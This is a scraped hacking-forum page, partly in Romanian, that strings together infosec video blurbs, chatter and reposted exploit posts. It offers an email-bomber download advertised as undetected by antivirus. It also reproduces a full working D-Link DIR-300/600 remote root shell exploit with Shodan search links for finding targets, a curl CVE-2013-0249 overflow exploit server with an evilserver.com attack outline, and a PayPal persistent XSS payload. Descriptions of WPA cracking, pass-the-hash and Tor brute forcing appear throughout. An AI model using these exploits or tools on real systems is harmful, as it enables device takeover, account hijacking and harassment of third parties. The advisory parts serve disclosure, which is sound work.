Praetorian503

Description: In this episode of TekTip, I am going to show a unique method to drive traffic to your Honeypot. While I use Kippo as the example this approach will work for any honeypot. If you have any other tips or tricks like this, let me know by leaving a comment or sending me an email at 1aN0rmus@TekDefense.com. TekDefense - News Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Tektip Ep21 - Drive Traffic To Your Honeypot

Screenshot: -About: Praetorian503 Date: 10.February.2013 Hour: 4:33:10 PM Size: 250 KB (256,000 bytes) Size on disk: 252 KB (258,048 bytes) -Options: E-mail Bomber(Set Interval(you can set a interval very fast time)); E-mail Sender; G-mail Bomber. How does it work? -File Scanned: -Results: Detection rate: [COLOR="#00FF00"]0[/COLOR] on [COLOR="#00FF00"]14[/COLOR] ([COLOR="#00FF00"]0[/COLOR]%) Status: [COLOR="#00FF00"]CLEAN[/COLOR] Download Link: Mediafire.com PS: E facut din plictiseala...Poate îi este folositor cuiva care vrea sa devina stresant .

Description: HackMe Credit is my first hackme project. Im showing there some hacking skills... Some of the examples in this hackme project is taken from real cases. Project Codes: hackmecredit - Vulnerable Web Application - Google Project Hosting. This video shows unsecured md5 encryption method. Tools used: HCON STF Music: Balkan Beat Box - Move It Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hackmecredit - Unsecured Encryption

Eu zic ca e mai simplu sa scrii Brazzers PS: Mai bine faceau in asa fel incat sa scriem 3,14z2.

Description: HackMe Credit is my first hackme project. Im showing there some hacking skills... Some of the examples in this hackme project is taken from real cases. Project Codes: hackmecredit - Vulnerable Web Application - Google Project Hosting. Tools used: HCON STF Music: Infected Mushroom - Project 100 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hackme Credit - Hacking Showoff

Description: All the ethical hackers know the "blocked ip" problem, When we try to brute force site and the site block our ip address... So i thought on a solution for this problem and i made this video about it. Tools used: My Scripts Music: djsn0w - December 10 2011 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Multi Ip Threaded Tor Bruteforce - Poc

Daca va punea parola criptata ce mai faceati? Parola merge, doar ca ati scris voi cu "l" mic sau ati dat copy/paste. Scrieti exact: Level-23.bizlol1 ON: Thanks.

In cazul asta mai ramane sa ne facem rugaciunea ori punem mana de la mana pentru un atac:))

ON Topic: Bine ai venit! Arunca o privire p'aci: Regulamentul Forumului Si foarte important: Sfaturi de om batran pentru ai nostri hackeri tineri OFF Topic: Frumos indexul, dar nu prea. E ridicol sa pui Hacked by vasile. Asta atrage doar atentia copiilor, nu si cea a oamenilor cu capul pe umeri (e doar un sfat) @Reckon Tu deja esti bolnav mintal, asa ca nu te iau in seama. Vorbeste cu asta _|_

Description: securitytube, hacking, hackers, information security, convention, computer security, defcon-20, defcon-2012 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Uncovering Sap Vulnerabilities: Reversing And Breaking The Diag Protocol

Description: In this video I will show you how to detect all the information about server security scripts or tools using whatweb tool. Whatweb tool developed by urbanadventurer aka Andrew Horton from Security-Assessment.com. In this demo I will show you some of useful options usage. More Information: - WhatWeb Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Whatweb - Next Generation Web Scanner

Description: In this video I will show you how to crack WPA-2 Encryption using pyrit Cracker tool. Why pyrit – pyrit is a very powerful and fast Wifi Cracker tool and Pyrit allows creating massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols. Source More Information : - pyrit - WPA/WPA2-PSK and a world of affordable many-core platforms - Google Project Hosting Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Crack Wpa-2 Using Pyrit

Description: The 4.9Ghz Public Safety Band has been deployed to a town near you! Police, Emergency Medical, and even Critical Infrastructure (power plants, etc.) maintain wireless networks on this seemingly 'hidden' band -- but what's actually there? How can you identify and monitor these networks? Stop by and find out the answers to those questions and more! Robert Potvliet heads Foundstone's wireless service line. Brad Antoniewicz Brad Antoniewicz works in Foundstone's open security research division to uncover flaws in popular technologies. He is a contributing author to both the Hacking Exposed and Hacking Exposed: Wireless series of books and has authored various internal/external Foundstone tools, whitepapers, and methodologies. Twitter:@foundstone Open Security Research Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: The Safety Dance - Wardriving The Public Safety Band

Description: The PSTN as you know it is changing. In March of 2012, the NSA announced "Project Fishbowl", a reference architecture for secure mobility VoIP usage on smartphones using WiFi or 3GPP networks. At the same time, mobile carriers in the US (seemingly) ensure that subscribers must purchase voice plans on their smartphones and can't opt for data only plans - which curtails a compelling option of purchasing a smartphone for data only usage, such as VoIP. Other mysterious clues abound. Since the mid-to-late 90s, users have been able to host their own web and email servers using open standards and DNS for advertisements, peering directly between domains and systems. At the same time, since the early 2000s, the technology and protocols have existed for enabling direct VoIP peering between enterprises, bypassing the PSTN, using DNS SRV records and ENUM - the same way we've been using DNS for HTTP and SMTP for years. But why is this seemingly attractive option for cost savings and collaboration not more widely adopted? Surely this is the way VoIP was meant to be used? Or isn't it? In this talk, we will explore the so-called market buzz of "UC Federation". Rather, we will kick this term to the bit bucket, and present an overview of how the industry is deploying these solutions technically. We will take a closer look at the security of being able to use UC between organizations, advertised using DNS, the same way that companies use UC internally for VoIP, HD Video, data sharing, IM & Presence, and collaboration applications. This talk is divided into three sections. First, we'll share our research on the state of public SIP peering using DNS SRV. Is SIP peering proliferating? How? What does it mean? Using a PoC research tool, we'll look at some initial data we've found, in order to plot the increase of peering using DNS SRV records for SIP service location advertisement. Second, we will show the audience findings from our UC "Federation" Honeypot research project. We've built a UC solution using a large commercial vendor, and have tested "Federation" with the help of the Global Federation Directory. Just to see what would happen. We've also set up a network of cloud based UC Federation honeypots using open source software, to explore attacks against UC Federation Systems. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: The End Of The Pstn As You Know It

Cool PDF Reader version 3.0.2.256 buffer overflow exploit. Link: PacketStorm PS: File is too large and does not make the post.

This exploit demonstrates the remote root vulnerability discovered by Michael Messner in D-Link DIR-300 and DIR-600 devices. #!/usr/bin/python # D-LINK TOTAL FAIL # http://www.s3cur1ty.de/m1adv2013-003 # Another Shit PoC by infodox # SHODANS BELOW # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300 # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600 # Who knew a shell could be so easy? import sys import requests import os if len(sys.argv) != 3: print "Usage: ./dlinkroot.py <target> <mode>" print "Modes: shell or telnetenable" print "I was lazy so I assume you have a telnet client" sys.exit(0) target = sys.argv[1] mode = sys.argv[2] def shell(target): print "[+] Connecting and spawning a shell..." while True: try: bobcat = raw_input("%s:~# " %(target)) lulz = "cmd=%s;" %(bobcat) url = "http://" + target + "/command.php" hax = requests.post(url, lulz) print hax.text except KeyboardInterrupt: print "\n[-] Quitting" sys.exit(1) def telnetenable(target): lulz = "cmd=telnetd;" url = "http://" + target + "/command.php" print "[+] Trying to enable telnet" try: hax = requests.post(url, lulz) print hax.text except Exception: print "[-] IT FAILED IT!" sys.exit(0) print "[+] Doing a telnet" try: os.system('telnet %s') %(target) except Exception: print "[-] IT FAILED IT!" sys.exit(1) if mode == "shell": shell(target) elif mode == "telnetenable": telnetenable(target) else: print "[] WHAT THE FUCK YOU'RE DOING IT WRONG!" Source: PacketStorm

Description: In this video I will show you how to perform a brute-force attack on a windows system and ones you have the password then using that password we will get the shall for this process we are using two tool for brute-force attack we are using acccheck and for the shell keipmx . Very easy to use if all the credential’s is correct then you have the shell. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Attack On Windows For The Shell

Description: In this video I will show you how to use smbexec tool. Smbexec is a pass the hash tool if you have the hash or plain text password so you can exploit the windows system using this tool. This tool will generate a backdoor and uploading on a victim machine and running it so other side you will get the meterpreter shell. Av Detection chances are low. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Smbexec Tool Usage

Description: The Internet of Things... It is coming, wearing hardware that communicates across the Internet is starting to become a reality, chips are getting smaller, as a society we are connected all the time... Building these devices is easier then we thought, putting them onto a network that is ours... EVEN BETTER! Come experience the Darknet of Things. Learn what we built, how we built it, and why. Learn how to get involved with a new community project, see what some of the DEF CON groups have been working on. Most importantly, learn how you can connect to the Darknet of Things. Anch - Just a lowly hacker out in Oregon, POC for DC503, Designer of the Network, and happily connected to the matrix. Twitter: @boneheadsanon The Darknet of Things | Making things that do our bidding. Omega - Hardware hacker extraordinare. Member of DC503, Designer of things, and thinks he should have taken the RED pill. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: The Darknet Of Things, Building Sensor Networks That Do Your Bidding

Description: All brand new tool additions to the Google Hacking Diggity Project - The Next Generation Search Engine Hacking Arsenal. As always, all tools are free for download and use. When last we saw our heroes, the Diggity Duo had demonstrated how search engine hacking could be used to take over someone’s Amazon cloud in less than 30 seconds, build out an attack profile of the Chinese government’s external networks, and even download all of an organization’s Internet facing documents and mine them for passwords and secrets. Google and Bing were forced to hug it out, as their services were seamlessly combined to identify which of the most popular websites on the Internet were unwittingly being used as malware distribution platforms against their own end-users. Now, we've traveled through space and time, my friend, to rock this house again... Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Tenacious Diggity: Skinny Dippin' In A Sea Of Bing

Hello, Welcome! OffTopic: Why did you choose to present yourself now?

A remotely exploitable buffer overflow vulnerability was discovered in the libcurl POP3 and SMTP protocol handlers. Proper exploitation can allow for arbitrary code execution. cURL buffer overflow Wed 06 February 2013 Volema found remotely exploitable buffer overflow vulnerability in libcurl POP3, SMTP protocol handlers which lead to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack. Vendor notified, CVE-2013-0249 relased. Attack Concept Outline We have the permissions to send custom HTTP requests with curl. We send request to our http://evilserver.com/ GET / HTTP/1.0 Host: evilserver.com server answers with HTTP/1.0 302 Found Location: pop3://x:x@evilserver.com/. "smart" curl interpretes redirect and connects to evilserver.com port 110/TCP using POP3 proto. Server answers +OK POP3 server ready curl sends CAPA servers answers with DIGEST-MD5 only +OK List of capabilities follows SASL DIGEST-MD5 IMPLEMENTATION dumbydumb POP3 server so, libcurl has to send AUTH DIGEST-MD5 then server sends the payload + cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg= and overflow happens because of fixed realm buffer size realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8 how it looks in gdb Program received signal SIGSEGV, Segmentation fault. 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6 (gdb) bt #0 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6 #1 0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message () from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4 #2 0x4141414141414141 in ?? () ... #1469 0x4141414141414141 in ?? () #1470 0x656d616e72657375 in ?? () Cannot access memory at address 0x7fff63b8b000 Original exploit: pop3d.py. #!/usr/bin/env python # -*- coding: utf-8 -*- # curl pop3 CVE-2013-0249 by Volema/MSLC import socket import base64 host = "localhost" port = 110 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((host, port)) s.listen(5) sock, addr = s.accept() sock.send('+OK POP3 server ready\n') while True: buf = sock.recv(1024) print buf if buf.find('USER') > -1: sock.send('+OK\n') if buf.find('PASS') > -1: sock.send('-ERR 999\n') if buf.find('CAPA') > -1: resp = '+OK List of capabilities follows\n' resp += 'SASL DIGEST-MD5\n' resp += 'IMPLEMENTATION dumbydumb POP3 server\n' resp += '.\n' sock.send(resp) if buf.find('QUIT') > -1: sock.send('+OK') break if buf.find('AUTH') > -1: realm = 'A'*128 payload = 'realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8' % realm resp = '+ '+base64.b64encode(payload)+'\n' print resp sock.send(resp) sock.close() Mitigation We recommend to disable protocols other than HTTP(S) in your application using options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS. libcurl version should be updated. Source: PacketStorm

Air Disk Wireless version 1.9 for iPad and iPhone suffers from local file inclusion and command injection vulnerabilities. Link: PacketStorm

PayPal suffered from a cross site scripting vulnerability. Title: ====== PayPal Bug Bounty #26 - Persistent Web Vulnerabilities Date: ===== 2013-01-26 References: =========== http://www.vulnerability-lab.com/get_content.php?id=703 PayPal UID: wam19c8kxn VL-ID: ===== 703 Common Vulnerability Scoring System: ==================================== 4.5 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a persistent Web Vulnerability in the official Paypal Community Forum Portal website application. Report-Timeline: ================ 2012-09-17: Researcher Notification & Coordination 2012-09-17: Vendor Notification 2012-10-22: Vendor Response/Feedback 2012-12-14: Vendor Fix/Patch 2013-01-26: Public Disclosure Status: ======== Published Affected Products: ================== Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent web vulnerability is located in the official Paypal Community Forum Portal website application. The bug allows remote attackers with low privileged application user account to inject via editor own malicious persistent script code. The vulnerabilities are located in the forum editor module with the bound vulnerable messageform & tag values. Remote attackers can compose malicious forum posts to hijack admin/moderator/customer accounts via the editor spell checker function. Successful exploitation result in local persistent web context manipulation, client side phishing or persistent session hijacking via messages body. Vulnerable Module(s): [+] Editor (in combination with the replace all function to execute) Vulnerable Parameter(s): [+] Message & Tags Proof of Concept: ================= The persistent vulnerability can be exploited by remote attackers with low privileged community account and with low or medium required user interaction. For demonstration or reproduce ... Review: Editor Listing - Link & Spell Replace > Execution <p>>"<<span style="" id="jS$6" class="j2">"></span> <span style="" id="jS$7" class="j2">"><iframe src="a" onload="alert("VL")" <"=""><[PERSISTENT INJECTED SCRIPT CODE!]) <</iframe></span> =<span id="jS$12" class="j2">http</span>://<span id="jS$9" class="j2">global</span>-<span id="jS$10" class="j4">evolution.info </span>/><span id="jS$11" class="j4">@gmail.com</span> Session Time: 17:30 - 18:00 URL: https://www.paypal-community.com/t5/forums/postpage/board-id/US-Protections Risk: ===== The security risk of the persistent web vulnerability is estimated as medium(+)|(-)high. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm